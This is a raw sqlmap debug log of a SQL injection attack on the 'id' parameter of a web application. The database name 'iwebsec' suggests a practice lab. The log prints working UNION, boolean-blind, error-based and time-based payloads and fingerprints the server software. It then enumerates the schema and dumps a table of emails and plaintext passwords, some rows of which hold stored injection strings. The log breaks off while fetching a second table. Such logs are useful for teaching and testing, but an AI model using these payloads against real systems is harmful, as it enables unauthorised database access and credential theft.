[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'MonetDB AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'MonetDB OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Vertica AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Vertica OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 error-based - Parameter replace' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird error-based - ORDER BY clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 error-based - ORDER BY clause' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)' because the payload for error-based has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL inline queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase inline queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle inline queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'SQLite inline queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Firebird inline queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries (comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (DECLARE)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Firebird stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query - comment)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query)' because its declared DBMS is different than identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR time-based blind (comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Firebird time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'SAP MaxDB time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'IBM DB2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Informix time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[09:13:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:13:06] [PAYLOAD] > LIKE 5.0.12
[09:13:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:13:06] [PAYLOAD] 1 ORDER BY 1-- -
[09:13:06] [PAYLOAD] 1 ORDER BY 7553-- -
[09:13:06] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:13:06] [PAYLOAD] 1 ORDER BY 10-- -
[09:13:06] [PAYLOAD] 1 ORDER BY 6-- -
[09:13:06] [PAYLOAD] 1 ORDER BY 4-- -
[09:13:06] [PAYLOAD] 1 ORDER BY 3-- -
[09:13:06] [INFO] target URL appears to have 3 columns in query
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,0x4d4b526677736a50497951716654486356625873476d666f785345616a6767506c4149484c76685a,0x7176767171),NULL-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,0x4d4b526677736a50497951716654486356625873476d666f785345616a6767506c4149484c76685a,0x7176767171),NULL UNION ALL SELECT NULL,CONCAT(0x7176787171,0x446841765a4375784b56474c63656c58736e7169487266625958415964626176416b535158726d41,0x7176767171),NULL-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,0x4d4b526677736a50497951716654486356625873476d666f785345616a6767506c4149484c76685a,0x7176767171),NULL FROM (SELECT 0 AS ifKk UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS mhyI-- -
[09:13:06] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[09:13:06] [DEBUG] skipping test 'Generic UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'Generic UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 20 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] skipping test 'MySQL UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[09:13:06] [DEBUG] checking for parameter length constraining mechanisms
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (4631 LIKE 4631) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 1 query in 0.02 seconds
[09:13:06] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:13:06] [DEBUG] used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (9771=9771) THEN 1 ELSE (SELECT 2364 UNION SELECT 5247) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176787171,(SELECT (ELT(4063=4063,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6421 FROM (SELECT(SLEEP(5)))KXRK)
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7176787171,0x4d4b526677736a50497951716654486356625873476d666f785345616a6767506c4149484c76685a,0x7176767171),NULL-- -
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[09:13:06] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[09:13:06] [INFO] the back-end DBMS is MySQL
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 1 query in 0.01 seconds
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 1 query in 0.01 seconds
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 1 query in 0.01 seconds
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 1 query in 0.01 seconds
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] turning off NATIONAL CHARACTER casting
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[09:13:06] [INFO] fetching current database
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x7176767171),NULL-- -
[09:13:06] [DEBUG] performed 1 query in 0.01 seconds
current database: 'iwebsec'
[09:13:06] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:13:06] [INFO] fetching current database
[09:13:06] [INFO] fetching tables for database: 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,table_name)),0x7176767171),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x69776562736563)-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(table_name AS CHAR),0x20),0x7176767171),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x69776562736563)-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,column_name,column_type)),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x73716c69 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(column_name AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(column_type AS CHAR),0x20),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x73716c69 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[09:13:06] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,email,id,password,username)),0x7176767171),NULL FROM iwebsec.sqli-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(email AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(id AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(password AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(username AS CHAR),0x20),0x7176767171),NULL FROM iwebsec.sqli-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[09:13:06] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[09:13:06] [INFO] fetching columns for table 'user' in database 'iwebsec'
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,JSON_ARRAYAGG(CONCAT_WS(0x706a7a7a6671,column_name,column_type)),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x75736572 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [PAYLOAD] 1 UNION ALL SELECT NULL,CONCAT(0x7176787171,IFNULL(CAST(column_name AS CHAR),0x20),0x706a7a7a6671,IFNULL(CAST(column_type AS CHAR),0x20),0x7176767171),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 0x75736572 AND table_schema LIKE 0x69776562736563-- -
[09:13:06] [DEBUG] performed 2 queries in 0.02 seconds
[09:13:06] [INFO] fetching entries for table 'user' in database 'iwebsec'
